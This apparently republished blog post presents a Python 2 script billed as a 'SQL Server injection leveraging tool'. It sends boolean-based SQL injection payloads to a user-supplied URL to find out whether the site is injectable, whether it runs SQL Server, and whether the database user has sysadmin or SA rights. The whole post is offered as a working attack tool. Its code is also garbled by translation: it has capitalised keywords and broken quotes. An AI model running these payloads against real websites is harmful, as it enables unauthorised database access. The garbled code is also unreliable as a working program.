Python write database sa user detection scheme

Source: Internet
Author: User
Tags sql server injection

Boring time, a small program written in Python, with a link to the injection point, to detect whether the current database user is SA, no technical content.

# Code by Zhaoxiaobu email:little.bu@hotmail.com

 
 
  1. #-*-Coding:utf-8-*-
  2. From sys import exit
  3. From Urllib import Urlopen
  4. From string import Join,strip
  5. From re import search
  6. Def is_sqlable ():
  7. sql1= "%20and%201=2"
  8. Sql2= "%20and%201=1"
  9. Urlfile1=urlopen (URL+SQL1)
  10. Urlfile2=urlopen (URL+SQL2)
  11. Htmlcodes1=urlfile1.read ()
  12. Htmlcodes2=urlfile2.read ()
  13. If not search (judge,htmlcodes1) and search (Judge,htmlcodes2):
  14. print "[INFO] Congratulations! This URL is a!n with an injected vulnerability."
  15. print "[Information] now determines whether the database is SQL Server, please be patient ..."
  16. Is_sqlserver ()
  17. Else
  18. Print [ERROR] Are you sure this URL will work? Try something else.!n "
  19. Def is_sqlserver ():
  20. sql = "%20and%20exists%20 (select%20*%20from%20sysobjects)"
  21. Urlfile=urlopen (Url+sql)
  22. Htmlcodes=urlfile.read ()
  23. If not search (judge,htmlcodes):
  24. print "[ERROR] database does not seem to be!n SQL Server"
  25. Else
  26. print "[INFO] confirms SQL Server database!n"
  27. print [INFO] begins to detect current database user permissions, please be patient ... "
  28. Is_sysadmin ()
  29. Def is_sysadmin ():
  30. sql = "%20and%201= (select%20is_srvrolemember (' sysadmin ')")
  31. Urlfile = Urlopen (url+sql)
  32. Htmlcodes = Urlfile.read ()
  33. If not search (judge,htmlcodes):
  34. print "[ERROR] The current database user does not have sysadmin permission!n"
  35. Else
  36. print [INFO] The current database user has sysadmin permissions!n "
  37. Print [INFO] detects if the current user is an SA, please be patient ...
  38. Is_sa ()
  39. Def Is_sa ():
  40. sql = "%20and%20 ' sa ' = (select%20system_user)";
  41. Urlfile = Urlopen (url+sql)
  42. Htmlcodes = Urlfile.read ()
  43. If not search (judge,htmlcodes):
  44. print "[ERROR] current database user is not Sa!n"
  45. Else
  46. print "[INFO] Current database user is Sa!n"
  47. Print "n####################################################################### #n"
  48. print "^o^ SQL Server injection leveraging tool ^o^"
  49. Print "Email:little.bu@hotmail.comn"
  50. print "========================================================================";
  51. url = raw_input (' [INFO] Please enter a link that may have an injection vulnerability!nurl: ')
  52. If url = = ':
  53. The URL provided by print "[ERROR] must have a format such as '. asp?xxx= '
  54. Exit (1)
  55. Judge = Raw_input ([INFO] Please provide a judgment string. N judgment string: ")
  56. If Judge = = ':
  57. print "[ERROR] to determine the string cannot be empty!"
  58. Exit (1)
  59. Is_sqlable ()
Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.